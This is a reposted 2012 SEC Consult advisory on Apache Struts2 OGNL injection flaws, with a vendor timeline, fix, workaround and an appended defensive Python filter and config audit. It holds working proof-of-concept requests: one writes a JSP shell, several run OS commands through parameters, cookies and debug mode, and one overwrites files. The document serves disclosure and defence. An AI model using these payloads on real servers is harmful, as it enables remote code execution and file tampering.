Assorted Struts2 vulnerabilities
http://localhost/index.html post:ageNo=2&words=%25E6%25B7%2598%25E5%25AE%259D%25E5%25AE%25A2&count='%2B#application%2B'&dtype

The original comes from EXP. My English is not very good and I did not use Google Translate, so there are many mistakes; classmates whose English is better, please help polish it. The scope of this vulnerability is very wide and it is extremely dangerous!

SEC Consult Vulnerability Lab Security Advisory < 20120104-0 >
=======================================================================
              title: Multiple critical vulnerabilities in Apache Struts2
            product: Apache Struts2
                     * OpenSymphony XWork
                     * OpenSymphony OGNL
 vulnerable version: 2.3.1 and below
      fixed version: 2.3.1.1
             impact: critical
           homepage: http://struts.apache.org/
              found: 2011-11-18
                 by: Johannes Dahse, Andreas Nusser
                     SEC Consult Vulnerability Lab
=======================================================================

Vendor description:
-------------------
Apache Struts2 is a web framework for creating Java web applications. It is
using the OpenSymphony XWork and OGNL libraries. By default, XWork's
ParametersInterceptor treats parameter names provided to actions as OGNL
expressions. An OGNL (Object Graph Navigation Language) expression is a limited
language similar to Java that is tokenized and parsed by the OGNL parser which
invokes appropriate Java methods. This allows e.g. convenient access to
properties that have a getter/setter method implemented. By providing a
parameter like "product.id=1" the OGNL parser will call the appropriate setter
getProduct().setId(1) in the current action context. OGNL is also able to call
arbitrary methods, constructors and access context variables. For more details
please refer to http://commons.apache.org/ognl/language-guide.html.

Vulnerability overview/description:
-----------------------------------
To prevent attackers calling arbitrary methods within parameters the flag
"xwork.MethodAccessor.denyMethodExecution" is set to "true" and the
SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by
default. Also, to prevent access to context variables an improved character
whitelist for parameter names is applied in XWork's ParametersInterceptor since
Struts 2.2.1.1:

acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(]+";

Under certain circumstances these restrictions can be bypassed to execute
malicious Java code.

1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)

When an exception occurs while applying parameter values to properties the
value is evaluated as OGNL expression. For example this occurs when setting a
string value to a property with type integer. Since the values are not
filtered an attacker can abuse the power of the OGNL language to execute
arbitrary Java code leading to remote command execution. This issue has been
reported () and was fixed in Struts 2.2.3.1. However the ability to execute
arbitrary Java code has been overlooked.

2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

The character whitelist for parameter names is not applied to Struts
CookieInterceptor.
When Struts is configured to handle cookie names, an
attacker can execute arbitrary system commands with static method access to
Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true
within the request.

3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)

Accessing the flag "allowStaticMethodAccess" within parameters is prohibited
since Struts 2.2.3.1. An attacker can still access public constructors with
only one parameter of type String to create new Java objects and access their
setters with only one parameter of type String. This can be abused for example
to create and overwrite arbitrary files. To inject forbidden characters to the
filename an uninitialized string property can be used.

4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)

While not being a security vulnerability itself, please note that applications
running in developer mode and using Struts DebuggingInterceptor are prone to
remote command execution as well. While applications should never run in
developer mode during production, developers should be aware that doing so not
only has performance issues (as documented) but also a critical security
impact.

Proof of concept:
-----------------
1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)

Given Test.java has a property "id" of type Integer or Long and appropriate
getter and setter methods:

    long id;

Given test.jsp with result name=input is configured for action "Test"
(the relevant part of struts.xml):

    <action name="Test" class="example.Test">
        <result name="input">test.jsp</result>
    </action>

The following request will trigger an exception, the value will be evaluated
as OGNL expression and arbitrary Java code can be executed (test request):

    /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'

An attacker can also overwrite flags that will allow direct OS command
execution (test request):

    /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'

If test.jsp displays the property "id" the result of the Java code evaluation
can be accessed (Struts tags):

    <%@ taglib prefix="s" uri="/struts-tags" %>
    <s:property value="id" />

2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

Given struts.xml is configured to handle all cookie names (independent of
limited cookie values):

    <action name="Test" class="example.Test">
        <interceptor-ref name="cookie">
            <param name="cookiesName">*</param>
            <param name="cookiesValue">1,2</param>
        </interceptor-ref>
        <result ...>
    </action>

The following HTTP header will execute an OS command when sent to Test.action:

    Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1

(This executes a command that launches the Windows calculator.)

3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)

Given Test.java has an uninitialized property "name" of type String:

    String name; // +getter+setter

The following request will create/overwrite the file "C:/sec-consult.txt"
(empty file):

    /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1

The existence of the property 'x' used in these examples is of no importance.

4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)

Given struts.xml is configured to run in developer mode and to use the
debugging interceptor:

    <constant name="struts.devMode" value="true" />

    <action name="Test" class="example.Test">
        <interceptor-ref name="debugging" />
        <result ...>
    </action>

The following request will execute arbitrary OGNL expressions leading to remote
command execution (test request):

    /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')

Vulnerable / tested versions:
-----------------------------
All products using Struts2 are affected by at least one critical vulnerability
listed above!

Proof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and
Struts 2.2.1.1
Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25
26 July 2010 and Struts 2.2.1.1, 2.2.3.1 and 2.3.1

Vendor contact timeline:
------------------------
2011-12-14: Contacting vendor through security at struts dot apache dot org
2011-12-14: Vendor reply, sending advisory draft
2011-12-14: Vendor released Apache Struts 2.3.1 in parallel
2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted
2011-12-16: Vendor reply, discussing workaround
2011-12-20: Discussing release of fixed version
2011-12-21: Providing additional information
2012-01-03: Vendor informs that update is ready
2012-01-03: Patch (2.3.1.1) is available

Solution:
---------
Update to Struts 2.3.1.1

Workaround:
-----------
Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the
Parameters- and CookieInterceptor:

acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+";

Don't run your applications in developer mode.

Advisory URL:
-------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

EOF J. Dahse, A. Nusser / 2012
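As a defensive complement to the workaround and to the configurations shown in the proofs of concept, here is an added Python example (not part of the advisory and not Struts code): it applies the stricter acceptedParamNames whitelist to parameter and cookie names the way XWork's full-match check would, and audits a struts.xml for the devMode, debugging-interceptor and cookiesName=* settings that issues 2 and 4 depend on. The function names and the sample struts.xml are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Stricter name whitelist from the advisory's workaround: no '(' ')' '#' '@' '='
# or whitespace, so a name cannot carry an OGNL method call or context access.
ACCEPTED_NAME = re.compile(r"[a-zA-Z0-9\.\]\[_']+")


def is_accepted_name(name):
    """Full-match check, mirroring XWork's Pattern.matcher(name).matches()."""
    return ACCEPTED_NAME.fullmatch(name) is not None


def reject_names(names):
    """Names the filter rejects. Run it over cookie names too: issue 2 above is
    that CookieInterceptor skipped this check entirely."""
    return [n for n in names if not is_accepted_name(n)]


def audit_struts_xml(xml_text):
    """Flag the struts.xml states the advisory warns about (issues 2 and 4)."""
    findings = []
    root = ET.fromstring(xml_text)
    for const in root.iter("constant"):
        if const.get("name") == "struts.devMode" and const.get("value", "").lower() == "true":
            findings.append("struts.devMode=true")
    for action in root.iter("action"):
        for ref in action.findall("interceptor-ref"):
            if ref.get("name") == "debugging":
                findings.append("action %s: debugging interceptor" % action.get("name"))
            if ref.get("name") == "cookie":
                for param in ref.findall("param"):
                    if param.get("name") == "cookiesName" and (param.text or "").strip() == "*":
                        findings.append("action %s: cookiesName=*" % action.get("name"))
    return findings


# Constructed sample struts.xml (hypothetical), modelled on the PoC configs above.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.devMode" value="true" />
  <package name="default" extends="struts-default">
    <action name="Test" class="example.Test">
      <interceptor-ref name="cookie">
        <param name="cookiesName">*</param>
        <param name="cookiesValue">1,2</param>
      </interceptor-ref>
      <interceptor-ref name="debugging" />
      <result name="input">test.jsp</result>
    </action>
  </package>
</struts>"""
```

Note that the parameter name `expression` passes the whitelist, which is why issue 4 is caught only by the configuration audit (devMode plus the debugging interceptor) and not by the name filter.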